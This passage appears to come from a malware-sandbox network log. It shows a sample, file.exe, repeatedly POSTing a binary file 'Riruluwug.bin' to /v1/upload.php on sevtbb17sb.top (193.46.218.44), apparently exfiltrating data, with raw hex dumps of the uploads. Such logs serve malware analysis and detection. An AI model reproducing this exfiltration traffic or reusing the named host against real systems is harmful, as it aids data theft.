Oct 20, 2024 22:47:52.983477116 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:52.983546972 CEST	4944	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:52.983612061 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:52.983741045 CEST	7416	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:47:52.983772993 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC
Oct 20, 2024 22:47:52.988151073 CEST	1236	OUT	Data Raw: 8c 02 0a fd 61 e7 a0 94 c1 ff 55 d7 73 d9 21 a4 96 91 5c 95 41 5b 56 ab 3e 8e 70 75 04 af e8 35 2b 97 fa 13 ce 5a e9 58 76 d4 28 a7 2d 00 9a df 1b 4e 3a 49 0e c0 98 43 83 ee d1 c3 de 00 fe 61 7b 95 c8 4c 35 23 8f f8 20 47 4a fd 44 eb ff 0d 3c c3 Data Ascii: aUs!\A[V>pu5+ZXv(-N:ICa{L5# GJD<{p$XnNkPeDE;=r'<BA\5axhuH, 3X":{Cl\V5o)f@zr[E^iNtEI4%>7* DX\pkM:MO
Oct 20, 2024 22:47:52.988394976 CEST	1236	OUT	Data Raw: 76 56 62 97 ad 68 b0 26 86 f6 d5 2b ea ba e5 a4 f9 55 d0 f9 f0 51 b3 1e e5 49 a2 29 46 1b 87 fa c4 48 1e 64 dc a9 c4 37 da e7 95 53 28 5d b4 62 53 b3 ae da a2 a1 b2 ab bc 3c 75 45 7f 46 a3 21 85 f8 1a 70 27 4f 86 ae 3b c4 40 d6 8a 0b 29 cf 1e df Data Ascii: vVbh&+UQI)FHd7S(]bS<uEF!p'O;@)on&JOD8EyJZ>14'g)lplZyFNU"==+;aaA 07L:o/*DfpYG?'?Qu1dbLfC9Ho.3
Oct 20, 2024 22:47:52.988446951 CEST	2472	OUT	Data Raw: 1a d1 06 15 d5 79 65 8a d4 47 6d c9 f7 d4 44 6f c3 14 5a 9d 03 b8 44 6c dd 81 85 5e 84 21 ac dd c2 75 44 2e 23 70 e5 a7 79 a8 ab 07 df 48 75 32 ad 45 49 9e 16 31 48 1f a9 b4 30 b4 30 3f c9 a5 73 3b af 12 11 e0 eb ab ea 4d d4 5e be 36 b6 30 75 f1 Data Ascii: yeGmDoZDl^!uD.#pyHu2EI1H00?s;M^60u?c~ui(w{"XYNrPN{b&-7;"[/TDg4DKY>37&viW[/\UY`#OElbwx.n1OYOQZi<}P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49771	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:54.633071899 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:54.633198977 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:54.638042927 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:47:54.638261080 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:54.638304949 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:54.638329983 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:47:54.638402939 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:54.638442039 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:47:54.638464928 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:47:54.641844034 CEST	2472	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:47:54.641916990 CEST	4944	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49772	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:56.226617098 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:56.226687908 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:56.231566906 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:47:56.231755972 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:56.231816053 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:56.231862068 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:47:56.231920958 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:56.231951952 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:47:56.232021093 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:47:56.232053995 CEST	2472	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:47:56.232081890 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49773	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:57.929666042 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:57.929749966 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:57.934689999 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:47:57.934745073 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:57.934782028 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:57.934935093 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:47:57.934978008 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:57.935161114 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:47:57.935267925 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:47:57.935311079 CEST	4944	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:47:57.939497948 CEST	2472	OUT	Data Raw: 8c 02 0a fd 61 e7 a0 94 c1 ff 55 d7 73 d9 21 a4 96 91 5c 95 41 5b 56 ab 3e 8e 70 75 04 af e8 35 2b 97 fa 13 ce 5a e9 58 76 d4 28 a7 2d 00 9a df 1b 4e 3a 49 0e c0 98 43 83 ee d1 c3 de 00 fe 61 7b 95 c8 4c 35 23 8f f8 20 47 4a fd 44 eb ff 0d 3c c3 Data Ascii: aUs!\A[V>pu5+ZXv(-N:ICa{L5# GJD<{p$XnNkPeDE;=r'<BA\5axhuH, 3X":{Cl\V5o)f@zr[E^iNtEI4%>7* DX\pkM:MO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49774	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:59.571260929 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:59.571436882 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:59.576273918 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
